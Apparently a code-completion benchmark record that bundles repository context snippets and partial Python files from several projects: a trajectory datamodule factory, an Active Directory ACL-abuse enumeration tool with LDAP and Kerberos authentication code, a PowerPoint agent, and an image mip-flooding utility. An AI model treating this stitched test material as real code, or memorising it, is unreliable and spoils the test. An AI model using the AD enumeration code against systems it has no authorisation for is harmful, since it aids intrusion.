"snippet": "def translate_pass_trajdata_cfg(cfg: ExperimentConfig):\n \"\"\"\n Translate a unified passthrough config to trajdata.\n \"\"\"\n rcfg = Dict()\n rcfg.step_time = cfg.algo.step_time\n rcfg.trajdata_cache_location = cfg.train.trajdata_cache_location\n rcfg.trajdata_source_train = cfg.train.trajdata_source_train\n rcfg.trajdata_source_valid = cfg.train.trajdata_source_valid\n rcfg.trajdata_data_dirs = cfg.train.trajdata_data_dirs\n rcfg.trajdata_rebuild_cache = cfg.train.trajdata_rebuild_cache\n\n rcfg.history_num_frames = cfg.algo.history_num_frames\n rcfg.future_num_frames = cfg.algo.future_num_frames\n\n rcfg.trajdata_centric = cfg.env.data_generation_params.trajdata_centric\n rcfg.trajdata_only_types = cfg.env.data_generation_params.trajdata_only_types\n rcfg.trajdata_predict_types = cfg.env.data_generation_params.trajdata_predict_types\n rcfg.trajdata_incl_map = cfg.env.data_generation_params.trajdata_incl_map\n rcfg.max_agents_distance = cfg.env.data_generation_params.trajdata_max_agents_distance\n rcfg.trajdata_standardize_data = cfg.env.data_generation_params.trajdata_standardize_data\n rcfg.trajdata_scene_desc_contains = cfg.env.data_generation_params.trajdata_scene_desc_contains\n\n rcfg.pixel_size = cfg.env.rasterizer.pixel_size\n rcfg.raster_size = int(cfg.env.rasterizer.raster_size)\n rcfg.raster_center = cfg.env.rasterizer.ego_center\n rcfg.num_sem_layers = cfg.env.rasterizer.num_sem_layers\n rcfg.drivable_layers = cfg.env.rasterizer.drivable_layers\n rcfg.no_map_fill_value = cfg.env.rasterizer.no_map_fill_value\n rcfg.raster_include_hist = cfg.env.rasterizer.include_hist\n\n rcfg.lock()\n return rcfg"
},
{
"identifier": "PassUnifiedDataModule",
"path": "tbsim/datasets/trajdata_datamodules.py",
"snippet": "class PassUnifiedDataModule(pl.LightningDataModule):\n \"\"\"\n Pass-through config options to unified data loader.\n This is a more general version of the above UnifiedDataModule which \n only supports any dataset available through trajdata.\n \"\"\"\n def __init__(self, data_config, train_config: TrainConfig):\n super(PassUnifiedDataModule, self).__init__()\n self._data_config = data_config\n self._train_config = train_config\n self.train_dataset = None\n self.valid_dataset = None\n self.num_sem_layers = None\n\n @property\n def modality_shapes(self):\n \"\"\"\n Returns the expected shape of combined rasterized layers\n (semantic + traj history + current)\n \"\"\"\n # num_history + current\n hist_layer_size = self._data_config.history_num_frames + 1 if self._data_config.raster_include_hist \\\n else 0\n return dict(\n image=(self.num_sem_layers + hist_layer_size, # semantic map\n self._data_config.raster_size,\n self._data_config.raster_size)\n )\n\n def setup(self, stage=None):\n data_cfg = self._data_config\n future_sec = data_cfg.future_num_frames * data_cfg.step_time\n history_sec = data_cfg.history_num_frames * data_cfg.step_time\n neighbor_distance = data_cfg.max_agents_distance\n agent_only_types = [TRAJDATA_AGENT_TYPE_MAP[cur_type] for cur_type in data_cfg.trajdata_only_types]\n agent_predict_types = None\n if data_cfg.trajdata_predict_types is not None:\n agent_predict_types = [TRAJDATA_AGENT_TYPE_MAP[cur_type] for cur_type in data_cfg.trajdata_predict_types]\n\n kwargs = dict(\n cache_location=data_cfg.trajdata_cache_location,\n desired_data=data_cfg.trajdata_source_train,\n desired_dt=data_cfg.step_time,\n future_sec=(future_sec, future_sec),\n history_sec=(history_sec, history_sec),\n data_dirs=data_cfg.trajdata_data_dirs,\n only_types=agent_only_types,\n only_predict=agent_predict_types,\n agent_interaction_distances=defaultdict(lambda: neighbor_distance),\n incl_map=data_cfg.trajdata_incl_map,\n map_params={\n \"px_per_m\": int(1 / data_cfg.pixel_size),\n \"map_size_px\": data_cfg.raster_size,\n \"return_rgb\": False,\n \"offset_frac_xy\": data_cfg.raster_center,\n \"no_map_fill_value\": data_cfg.no_map_fill_value,\n },\n centric=data_cfg.trajdata_centric,\n scene_description_contains=data_cfg.trajdata_scene_desc_contains,\n standardize_data=data_cfg.trajdata_standardize_data,\n verbose=True,\n num_workers=os.cpu_count(),\n rebuild_cache=data_cfg.trajdata_rebuild_cache,\n rebuild_maps=data_cfg.trajdata_rebuild_cache,\n )\n print(kwargs)\n self.train_dataset = UnifiedDataset(**kwargs)\n\n kwargs[\"desired_data\"] = data_cfg.trajdata_source_valid\n self.valid_dataset = UnifiedDataset(**kwargs)\n\n # set modality shape based on input\n self.num_sem_layers = 0 if not data_cfg.trajdata_incl_map else data_cfg.num_sem_layers\n\n gc.collect()\n\n def train_dataloader(self):\n return DataLoader(\n dataset=self.train_dataset,\n shuffle=True,\n batch_size=self._train_config.training.batch_size,\n num_workers=self._train_config.training.num_data_workers,\n drop_last=True,\n collate_fn=self.train_dataset.get_collate_fn(return_dict=True),\n persistent_workers=False\n )\n\n def val_dataloader(self):\n return DataLoader(\n dataset=self.valid_dataset,\n shuffle=True, # since pytorch lightning only evals a subset of val on each epoch, shuffle\n batch_size=self._train_config.validation.batch_size,\n num_workers=self._train_config.validation.num_data_workers,\n drop_last=True,\n collate_fn=self.valid_dataset.get_collate_fn(return_dict=True),\n persistent_workers=False\n )\n\n def test_dataloader(self):\n pass\n\n def predict_dataloader(self):\n pass"
}
] | from tbsim.utils.config_utils import translate_pass_trajdata_cfg
from tbsim.datasets.trajdata_datamodules import PassUnifiedDataModule | 1,604 | """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"):
| """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"): | trajdata_config = translate_pass_trajdata_cfg(config) | 0 | 2023-10-31 18:43:07+00:00 | 4k |
AetherBlack/abuseACL | abuseACL/network/LDAP.py | [
{
"identifier": "sAMAccountType",
"path": "abuseACL/structures/sAMAccountType.py",
"snippet": "class sAMAccountType:\n\n SAM_DOMAIN_OBJECT = 0x0\n SAM_GROUP_OBJECT = 0x10000000\n SAM_NON_SECURITY_GROUP_OBJECT = 0x10000001\n SAM_ALIAS_OBJECT = 0x20000000\n SAM_NON_SECURITY_ALIAS_OBJECT = 0x20000001\n SAM_USER_OBJECT = 0x30000000\n SAM_NORMAL_USER_ACCOUNT = 0x30000000\n SAM_MACHINE_ACCOUNT = 0x30000001\n SAM_TRUST_ACCOUNT = 0x30000002\n SAM_APP_BASIC_GROUP = 0x40000000\n SAM_APP_QUERY_GROUP = 0x40000001\n SAM_ACCOUNT_TYPE_MAX = 0x7fffffff"
},
{
"identifier": "Credentials",
"path": "abuseACL/structures/Credentials.py",
"snippet": "class Credentials:\n\n def __init__(self, username: str, password: str, domain: str, ntlmhash: str, aesKey: str, doKerberos: bool) -> None:\n self.username = username\n self.password = password\n self.domain = domain\n self.ntlmhash = ntlmhash\n self.aesKey = aesKey\n self.doKerberos = doKerberos\n\n def getAuthenticationSecret(self) -> str:\n return self.password or self.ntlmhash"
},
{
"identifier": "Target",
"path": "abuseACL/structures/Target.py",
"snippet": "class Target:\n\n tlsv1_2: bool = None\n tlsv1: bool = None\n\n def __init__(self, remote: str, port: int) -> None:\n self.remote = remote\n self.port = port\n\n def use_tls(self) -> bool:\n return self.tlsv1_2 or self.tlsv1"
},
{
"identifier": "ADCertificateTemplate",
"path": "abuseACL/structures/ADObject/ADCertificateTemplate.py",
"snippet": "class ADCertificateTemplate(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "ADAdminSDHolder",
"path": "abuseACL/structures/ADObject/ADAdminSDHolder.py",
"snippet": "class ADAdminSDHolder(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "ADComputer",
"path": "abuseACL/structures/ADObject/ADComputer.py",
"snippet": "class ADComputer(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes, userAccountControl: int) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n self.userAccountControl = int(userAccountControl[0].decode())\n\n self.isUserEnable = self.userAccountControl & 0x0002\n\n @staticmethod\n def getComputerSid(computers: list, computername: str) -> str:\n for computer in computers:\n computer: ADComputer\n\n if computer.sAMAccountName == computername:\n return computer.objectSid\n\n return None"
},
{
"identifier": "ADSchema",
"path": "abuseACL/structures/ADObject/ADSchema.py",
"snippet": "class ADSchema(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "ADGroup",
"path": "abuseACL/structures/ADObject/ADGroup.py",
"snippet": "class ADGroup(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n @staticmethod\n def getGroupSid(groups: list, groupname: str) -> str:\n for group in groups:\n group: ADGroup\n\n if group.sAMAccountName == groupname:\n return group.objectSid\n\n return None"
},
{
"identifier": "ADUser",
"path": "abuseACL/structures/ADObject/ADUser.py",
"snippet": "class ADUser(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, userPrincipalName: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes, userAccountControl: int) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.userPrincipalName = userPrincipalName[0].decode() if len(userPrincipalName) else userPrincipalName\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n self.userAccountControl = int(userAccountControl[0].decode())\n\n self.isUserEnable = self.userAccountControl & 0x0002\n\n @staticmethod\n def getUserSid(users: list, username: str) -> str:\n for user in users:\n user: ADUser\n\n if user.sAMAccountName == username:\n return user.objectSid\n\n return None"
},
{
"identifier": "ADgMSA",
"path": "abuseACL/structures/ADObject/ADgMSA.py",
"snippet": "class ADgMSA(ADObject):\n\n def __init__(self, distinguishedName: str, sAMAccountName: str, objectSid: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.sAMAccountName = sAMAccountName[0].decode().lower()\n self.objectSid = self.convertSid(objectSid[0])\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n @staticmethod\n def getgMSASid(gMSAs: list, principal: str) -> str:\n for gMSA in gMSAs:\n gMSA: ADgMSA\n\n print(gMSA.sAMAccountName, principal)\n\n if gMSA.sAMAccountName == principal:\n return gMSA.objectSid\n\n return None"
},
{
"identifier": "ADGPO",
"path": "abuseACL/structures/ADObject/ADGPO.py",
"snippet": "class ADGPO(ADObject):\n\n def __init__(self, distinguishedName: str, displayName: str, gPCFileSysPath: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.displayName = displayName[0].decode()\n self.gPCFileSysPath = gPCFileSysPath[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.displayName\n self.objectSid = str()"
},
{
"identifier": "ADOU",
"path": "abuseACL/structures/ADObject/ADOU.py",
"snippet": "class ADOU(ADObject):\n\n def __init__(self, distinguishedName: str, name: str, nTSecurityDescriptor: bytes) -> None:\n self.distinguishedName = distinguishedName[0].decode()\n self.name = name[0].decode()\n self.nTSecurityDescriptor = self.parseSecurityDescriptor(nTSecurityDescriptor[0])\n\n self.sAMAccountName = self.name\n self.objectSid = str()"
},
{
"identifier": "Kerberos",
"path": "abuseACL/network/Kerberos.py",
"snippet": "class Kerberos:\n\n @staticmethod\n def kerberosLogin(target: str, user: str, password: str, domain: str = \"\", hashes: str = \"\", aesKey: str = \"\",\n kdcHost: str = None, TGT=None, TGS=None, useCache: bool = False):\n\n if len(hashes):\n lmhash, nthash = hashes.split(\":\")\n\n if len(lmhash) % 2:\n lmhash = \"0\" + lmhash\n if len(nthash) % 2:\n nthash = \"0\" + nthash\n\n lmhash = bytes.fromhex(lmhash)\n nthash = bytes.fromhex(nthash)\n else:\n lmhash, nthash = \"\", \"\"\n\n if TGT is None or TGS is None:\n useCache = True\n\n targetName = \"ldap/%s\" % target\n if useCache:\n domain, user, TGT, TGS = CCache.parseFile(domain, user, targetName)\n\n # First of all, we need to get a TGT for the user\n userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n if TGT is None and TGS is None:\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,\n aesKey, kdcHost)\n else:\n tgt = TGT['KDC_REP']\n cipher = TGT['cipher']\n sessionKey = TGT['sessionKey']\n\n if TGS is None:\n serverName = Principal(targetName, type=constants.PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,\n sessionKey)\n else:\n tgs = TGS['KDC_REP']\n cipher = TGS['cipher']\n sessionKey = TGS['sessionKey']\n\n # Let's build a NegTokenInit with a Kerberos REQ_AP\n\n blob = SPNEGO_NegTokenInit()\n\n # Kerberos\n blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]\n\n # Let's extract the ticket from the TGS\n tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]\n ticket = Ticket()\n ticket.from_asn1(tgs['ticket'])\n\n # Now let's build the AP_REQ\n apReq = AP_REQ()\n apReq['pvno'] = 5\n apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)\n\n opts = []\n apReq['ap-options'] = constants.encodeFlags(opts)\n seq_set(apReq, 'ticket', ticket.to_asn1)\n\n authenticator = Authenticator()\n authenticator['authenticator-vno'] = 5\n authenticator['crealm'] = domain\n seq_set(authenticator, 'cname', userName.components_to_asn1)\n now = datetime.datetime.utcnow()\n\n authenticator['cusec'] = now.microsecond\n authenticator['ctime'] = KerberosTime.to_asn1(now)\n\n encodedAuthenticator = encoder.encode(authenticator)\n\n # Key Usage 11\n # AP-REQ Authenticator (includes application authenticator\n # subkey), encrypted with the application session key\n # (Section 5.5.1)\n encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)\n\n apReq['authenticator'] = noValue\n apReq['authenticator']['etype'] = cipher.enctype\n apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator\n\n blob['MechToken'] = encoder.encode(apReq)\n\n return blob"
},
{
"identifier": "Logger",
"path": "abuseACL/core/Logger.py",
"snippet": "class Logger:\n\n def __init__(self, debug: bool, timestamp: bool) -> None:\n self.__debug = debug\n self.__timestamp = timestamp\n\n def __toStdout(self, color: str, title: str, msg: str) -> None:\n timestamp = str()\n\n if self.__timestamp:\n timestamp = time.strftime(\"[%Y/%m/%d %H:%M:%S] \")\n\n print(\"%s%s[%s] %s%s\" % (color, timestamp, title, msg, Style.RESET_ALL))\n\n def debug(self, msg: str) -> None:\n if self.__debug:\n self.__toStdout(Fore.BLUE, \"i\", msg)\n\n def error(self, msg: str) -> None:\n self.__toStdout(Fore.RED, \"!\", msg)\n\n def vuln(self, msg: str) -> None:\n self.__toStdout(Fore.GREEN, \"*\", msg)"
}
] | from typing import List
from abuseACL.structures.sAMAccountType import sAMAccountType
from abuseACL.structures.Credentials import Credentials
from abuseACL.structures.Target import Target
from abuseACL.structures.ADObject.ADCertificateTemplate import ADCertificateTemplate
from abuseACL.structures.ADObject.ADAdminSDHolder import ADAdminSDHolder
from abuseACL.structures.ADObject.ADComputer import ADComputer
from abuseACL.structures.ADObject.ADSchema import ADSchema
from abuseACL.structures.ADObject.ADGroup import ADGroup
from abuseACL.structures.ADObject.ADUser import ADUser
from abuseACL.structures.ADObject.ADgMSA import ADgMSA
from abuseACL.structures.ADObject.ADGPO import ADGPO
from abuseACL.structures.ADObject.ADOU import ADOU
from abuseACL.network.Kerberos import Kerberos
from abuseACL.core.Logger import Logger
import ssl as tls
import ldap3 | 3,501 |
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
|
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
| def __init__(self, forest: str, target: Target, credentials: Credentials, logger: Logger) -> None: | 13 | 2023-10-30 21:19:24+00:00 | 4k |
gydpku/PPTC | src/modeling.py | [
{
"identifier": "ppt_executor",
"path": "src/ppt_executor.py",
"snippet": "SLIDE_HEIGHT = 6858000\nSLIDE_WIDTH = 9144000\nCENTER_TOP = 3429000\nCENTER_LEFT = 4572000\nSHAPE_HEIGHT = 900000\nSHAPE_WIDTH = 900000\nTABLE_HEIGHT = 370000 # per line\nCONTENT_HEIGHT = 4351338\nCONTENT_WIDTH = 7886700\nCONTENT_LEFT = 628650\nCONTENT_TOP = 1825625\nTITLE_HEIGHT = 1325563\nTITLE_WIDTH = 7886700\nTITLE_LEFT = 628650\nTITLE_TOP = 365126\nMARGIN = 600000\nCORNER_LEFT = 0 + MARGIN\nCORNER_TOP = 0 + MARGIN\nCORNER_RIGHT = SLIDE_WIDTH - MARGIN\nCORNER_BOTTOM = SLIDE_HEIGHT - MARGIN\nSHAPE_LEFT = CENTER_LEFT - SHAPE_WIDTH / 2\nSHAPE_TOP = CENTER_TOP - SHAPE_HEIGHT / 2\nPIC_LEFT = CONTENT_LEFT\nPIC_TOP = CONTENT_TOP \nPIC_PATH = \"./PPTC/\"+\"test/pics\"\ndef check_api_in_list(line, api_list):\ndef API_executor(lines, test=False,args=None):\ndef set_ppt(ppt_path):\ndef set_current_slide(idx):\ndef get_ppt():\ndef save_ppt(ppt_path):\ndef get_current_page_id():\ndef create_slide():\ndef move_to_next_slide():\ndef move_to_previous_slide():\ndef move_to_slide(idx):\ndef set_background_color(color):\ndef choose_title():\ndef choose_content():\ndef choose_textbox(idx=0):\ndef choose_picture(idx=0):\ndef choose_chart():\ndef choose_shape(shape_name):\ndef choose_table():\ndef choose_table_cell(row_id, column_id):\ndef insert_text(text):\ndef insert_bullet_point(text):\ndef insert_note(note):\ndef insert_textbox():\ndef delete_text():\ndef set_font_size(size):\ndef set_font_color(color):\ndef set_font_bold():\ndef set_font_italic():\ndef set_font_underline():\ndef set_font_style(font_name):\ndef set_line_space(line_space_level=0):\ndef text_align_left():\ndef text_align_center():\ndef text_align_right():\ndef insert_rectangle():\ndef insert_right_arrow():\ndef insert_rounded_rectangle():\ndef insert_triangle():\ndef insert_callout():\ndef insert_cloud():\ndef insert_star():\ndef insert_circle():\ndef insert_picture(picture_name):\ndef set_width(width):\ndef set_height(height):\ndef rotate_element(angle):\ndef set_fill_color(color):\ndef align_top_right_corner():\ndef align_top_left_corner():\ndef align_bottom_right_corner():\ndef align_bottom_left_corner():\ndef align_slide_left():\ndef align_slide_right():\ndef align_slide_top():\ndef align_slide_bottom():\ndef align_slide_center():\ndef set_left(left):\ndef set_top(top):\ndef insert_table(row_num, col_num):\ndef insert_table_row(row_data):\ndef insert_line_chart(data,series=None):\ndef insert_bar_chart(data,series=None):\ndef insert_pie_chart(data,series=None):\ndef set_chart_title(title):"
},
{
"identifier": "ppt_reader",
"path": "src/ppt_reader.py",
"snippet": "SCALE = 1000\ndef get_fill_color(shape):\n def __init__(self, shape):\n def text_info(self):\n def space_info(self):\n def size_info(self):\n def style_info(self):\n def discription(self):\n def __repr__(self):\n def __init__(self, shape, id=None):\n def style_info(self):\n def discription(self):\n def __init__(self, shape):\n def text_info(self):\n def discription(self):\n def __init__(self, shape):\n def text_info(self):\n def style_info(self):\n def discription(self):\n def __init__(self, shape, id=None):\n def text_info(self):\n def style_info(self):\n def discription(self):\n def __init__(self, shape):\n def text_info(self):\n def style_info(self):\n def __init__(self, shape):\n def text_info(self):\n def style_info(self):\ndef hasshape(shape_str, shape_list):\ndef get_content(need_text,need_style,need_position,need_title,need_content,need_picture,need_table,need_chart,need_textbox,need_shape):\ndef get_content_by_instructions(ppt_path, instruction, args, ppt):\ndef eval_get_contents(need_text=True, need_style=True, need_position=True, need_shape_list=None, ppt=None):\nclass BasicShape:\nclass Picture(BasicShape):\nclass Table(BasicShape):\nclass Chart(BasicShape):\nclass Textbox(BasicShape):\nclass Placeholder(BasicShape):\nclass AutoShape(BasicShape):"
},
{
"identifier": "openai_api",
"path": "src/openai_api.py",
"snippet": "def completions_with_backoff(**kwargs):\ndef chat_with_backoff(**kwargs):\ndef embeddings_with_backoff(**kwargs):\ndef query_azure_openai(query, model = \"vicuna-13b-v1.5-16k\",id=None):\n def truncate_text_with_token_count (text, max_tokens):\ndef rewrite(prompt):"
},
{
"identifier": "prompt_factor",
"path": "src/prompt_factor.py",
"snippet": "def get_instruction_to_API_code_prompt(selected_API, ppt_content, chat_history, instruction, ask_less_question=False, current_page=1):\ndef get_instruction_to_API_code_prompt2(selected_API, ppt_content, chat_history, instruction, ask_less_question=False, current_page=1):"
},
{
"identifier": "dataset",
"path": "src/dataset.py",
"snippet": "def load_data(path, dataset, args):\ndef load_data_json(path, dataset):"
},
{
"identifier": "api_selection",
"path": "src/api_selection.py",
"snippet": "K = None\n K = args.api_topk\ndef get_topk(scores, k=10):\ndef get_embedding(text):\ndef get_api_embedding(args):\ndef select_api(query, k=10):\ndef get_selected_apis(instruction, args):\ndef get_all_apis(args):\ndef prepare_embedding(args):"
},
{
"identifier": "utils",
"path": "src/utils.py",
"snippet": "def write_list(lst, filename):\ndef read_list(filename):\ndef write_lines(lst, path):\ndef read_lines(path):\ndef makedir(path):\ndef merge_list(lst):\ndef get_picture_name(labels):\ndef get_picture_name_list(args):\ndef parse_api(codes):\ndef prepare_exp_name(args):\ndef get_tokens(text):\ndef calc_api_cost(path):\ndef check_token(model, prompt):\ndef get_token(text, trunc_num, model):\ndef checkpoint(mode,args,idx,step):\ndef sorted_list(path):\ndef parse_train_json(path):\ndef parse_test_json(path):"
},
{
"identifier": "api_doc",
"path": "src/api_doc.py",
"snippet": "class API(object):\n def __init__(self, name, parameters, description,\n parameter_description=\"\", composition_instruction=\"\", example=\"\", api_desc=\"\",\n type=\"\",\n implementation=None,\n ):\n def __str__(self):\ndef random_permutation(lst):\ndef get_all_APIs(args):\ndef get_API_name(apis):\ndef get_API_desc(apis):\ndef get_must_APIs(args):\ndef api_lack_mask(apis):"
}
] | from src import ppt_executor, ppt_reader, openai_api, prompt_factor, dataset, api_selection, utils, api_doc | 1,944 |
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt):
|
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt): | content, prompt = ppt_reader.get_content_by_instructions(ppt_path, instruction, args, ppt) | 1 | 2023-10-25 13:14:46+00:00 | 4k |
secarri/MipFlooding | mipflooding/image_processing.py | [
{
"identifier": "setup_logger",
"path": "mipflooding/logger.py",
"snippet": "def setup_logger(logger_name: str, abs_log_path: str) -> logging.Logger:\n \"\"\"Set up a logger with the specified name and log to the given absolute path, returning the logger instance.\"\"\"\n logger = logging.getLogger(logger_name)\n if not logger.handlers:\n handler = logging.FileHandler(abs_log_path)\n formatter = logging.Formatter('[%(asctime)s] - %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n handler.setFormatter(formatter)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n return logger"
},
{
"identifier": "terminate_loggers",
"path": "mipflooding/logger.py",
"snippet": "def terminate_loggers(logger: logging.Logger) -> None:\n \"\"\"Terminate and close all handlers associated with the given logger, releasing any associated resources.\"\"\"\n handlers = logger.handlers[:]\n for handler in handlers:\n handler.close()\n logger.removeHandler(handler)"
},
{
"identifier": "clear_log_file",
"path": "mipflooding/file_utils.py",
"snippet": "def clear_log_file(filepath: Path) -> None:\n \"\"\"Clear the content of the log file at the specified 'filepath' if it exists.\"\"\"\n filepath.write_text(\"\", encoding=\"utf-8\")"
},
{
"identifier": "get_output_directory",
"path": "mipflooding/file_utils.py",
"snippet": "def get_output_directory(filepath: str) -> str | None:\n \"\"\"Get the parent directory of the specified 'filepath' as a string if it exists, or return None.\"\"\"\n parent_path = Path(filepath).parent\n return parent_path.__str__() if parent_path.exists() else None"
},
{
"identifier": "get_output_filename",
"path": "mipflooding/file_utils.py",
"snippet": "def get_output_filename(filepath: str) -> str | None:\n \"\"\"Get the filename from the specified 'filepath' as a string, or return None if the path is empty.\"\"\"\n return Path(filepath).name.__str__()"
}
] | import logging
import math
import os
import time
from pathlib import Path
from typing import List, Optional
from PIL import Image
from .logger import setup_logger, terminate_loggers
from .file_utils import clear_log_file, get_output_directory, get_output_filename | 1,829 |
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
input_texture_color_abs_path: str) -> str | Optional[None]:
if color is None or alpha_mask is None:
message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
elif not _do_resolutions_match(color, alpha_mask, logger):
message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
elif not _is_power_of_two_image(color, logger):
message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
else:
message = None
return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
"""Check if the resolutions of color and alpha images match."""
logger.info("--- Verifying that inputs resolutions do match ...")
return True if color.size == alpha.size else False
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
"""Check if all dimensions of the input image are powers of two."""
logger.info("--- Verifying that inputs are power of two images ...")
for res in color.size:
if (res & (res - 1)) != 0:
return False
return True
def _get_mip_levels(image: Image, logger: logging.Logger) -> int:
"""Calculate the number of mip levels based on image size."""
logger.info("--- Calculating mip map levels...")
image_short_side = image.size[0] if image.size[0] < image.size[1] else image.size[1]
logger.info(f"--- Done. Miplevels: {round(math.log2(image_short_side))}")
return round(math.log2(image_short_side))
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: Image) -> int:
"""Calculate the height of the image based on the specified width."""
width_percent = (image_width / float(image.size[0]))
